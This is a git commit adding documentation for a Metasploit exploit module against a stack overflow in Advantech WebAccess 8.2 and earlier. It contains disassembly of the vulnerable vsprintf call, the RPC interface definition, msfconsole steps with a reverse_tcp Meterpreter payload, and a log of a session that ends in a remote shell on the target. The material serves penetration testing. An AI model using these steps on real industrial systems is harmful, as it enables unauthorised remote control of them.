added some docs

stevenseeley · stevenseeley · commit 073ffcb3bc64 · 2017-12-07T16:58:14.000-06:00
diff --git a/documentation/modules/exploit/windows/scada/advantech_webaccess_webvrpcs_bof.md b/documentation/modules/exploit/windows/scada/advantech_webaccess_webvrpcs_bof.md
@@ -0,0 +1,108 @@
+## Vulnerable Application
+
+  [Advantech WebAccess <= 8.2](http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170330.exe)
+
+## Vulnerability Analysis
+
+The stack overflow happens in sub_10004BC8:
+
+```
+.text:10004BC8 ; int __cdecl sub_10004BC8(char *Format, char)
+.text:10004BC8 sub_10004BC8    proc near               ; 
+.text:10004BC8                                         ;
+.text:10004BC8
+.text:10004BC8 lpWindowName    = dword ptr -818h
+.text:10004BC8 hWnd            = dword ptr -814h
+.text:10004BC8 lpClassName     = dword ptr -810h
+.text:10004BC8 Args            = dword ptr -80Ch
+.text:10004BC8 lpBaseAddress   = dword ptr -808h
+.text:10004BC8 hFileMappingObject= dword ptr -804h
+.text:10004BC8 Dest            = byte ptr -800h
+.text:10004BC8 Format          = dword ptr  8
+.text:10004BC8 arg_4           = byte ptr  0Ch
+.text:10004BC8
+.text:10004BC8                 push    ebp
+.text:10004BC9                 mov     ebp, esp
+.text:10004BCB                 sub     esp, 818h
+.text:10004BD1                 mov     [ebp+lpWindowName], offset aDebugScreen1    ; "Debug Screen1"
+.text:10004BDB                 mov     [ebp+lpClassName], offset aDebugwclass1     ; "debugWClass1"
+.text:10004BE5                 lea     eax, [ebp+arg_4]
+.text:10004BE8                 mov     [ebp+Args], eax
+.text:10004BEE                 mov     ecx, [ebp+Args]
+.text:10004BF4                 push    ecx                                         ; Args
+.text:10004BF5                 mov     edx, [ebp+Format]
+.text:10004BF8                 push    edx                                         ; Format
+.text:10004BF9                 lea     eax, [ebp+Dest]
+.text:10004BFF                 push    eax                                         ; Dest
+.text:10004C00                 call    ds:vsprintf                                 ; overflow
+```
+
+The corresponding IDL is below:
+
+```
+[
+ uuid(5d2b62aa-ee0a-4a95-91ae-b064fdb471fc),
+ version(1.0)
+]
+
+interface target_interface
+{
+
+/* opcode: 0x01, address: 0x00401260 */
+
+void sub_401260 (
+ [in] handle_t  arg_1,
+ [in] long  arg_2,
+ [in] long  arg_3,
+ [in] long  arg_4,
+ [in][ref][size_is(arg_4)] char * arg_5,
+ [out][ref] long * arg_6
+);
+
+}
+```
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use exploits/windows/scada/advantech_webaccess_webvrpcs_bof`
+  3. `set payload windows/meterpreter/reverse_tcp`
+  4. `set LHOST XXX.XXX.XXX.XXX`
+  5. `exploit`
+  6. **Verify** you get a connect back meterpreter
+
+
+## Options
+
+  None.
+
+## Scenarios
+
+  ```
+saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/advantech.rc 
+[*] Processing scripts/advantech.rc for ERB directives.
+resource (scripts/advantech.rc)> use exploit/windows/scada/advantech_webaccess_opcode_80061
+resource (scripts/advantech.rc)> set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+resource (scripts/advantech.rc)> set RHOST 172.16.175.145
+RHOST => 172.16.175.145
+resource (scripts/advantech.rc)> set LHOST 172.16.175.1
+LHOST => 172.16.175.1
+resource (scripts/advantech.rc)> exploit
+[*] Started reverse TCP handler on 172.16.175.1:4444 
+[*] 172.16.175.145:4592 - Binding to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.145[4592] ...
+[*] 172.16.175.145:4592 - Bound to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.145[4592] ...
+[+] 172.16.175.145:4592 - Got a handle: 0x01d729e0
+[*] 172.16.175.145:4592 - Trying target Advantech WebAccess <= 8.2...
+[*] Sending stage (957487 bytes) to 172.16.175.145
+[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.145:49351) at 2017-05-31 14:38:13 -0500
+[*] 172.16.175.145:4592 - The DCERPC service did not reply to our request
+
+meterpreter > shell
+Process 5208 created.
+Channel 1 created.
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\WebAccess\Node>
+```
